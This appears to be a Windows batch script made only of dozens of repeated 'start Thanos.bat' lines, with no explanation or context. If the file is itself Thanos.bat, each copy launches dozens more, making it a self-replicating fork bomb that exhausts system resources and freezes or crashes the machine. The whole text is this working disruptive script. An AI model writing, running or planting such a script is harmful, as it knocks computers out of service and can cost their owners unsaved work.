start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat
start Thanos.bat